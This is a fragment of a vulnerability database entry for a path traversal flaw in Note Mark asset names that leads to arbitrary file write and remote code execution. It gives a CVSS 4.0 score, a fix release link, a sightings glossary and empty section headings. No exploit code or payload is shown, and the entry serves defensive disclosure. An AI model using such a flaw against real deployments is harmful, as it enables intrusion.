      "url": "https://github.com/enchant97/note-mark/releases/tag/v0.19.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Note Mark: Arbitrary File Write via Path Traversal in Asset Names Leads to Remote Code Execution"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-44522 (GCVE-0-2026-44522)

FKIE_CVE-2026-44522

GHSA-G49P-4QXJ-88V3

Description

Source Code Analysis

Steps to Reproduce

Proof of Concept (Video)

Recommendations

Tags

Sightings

Nomenclature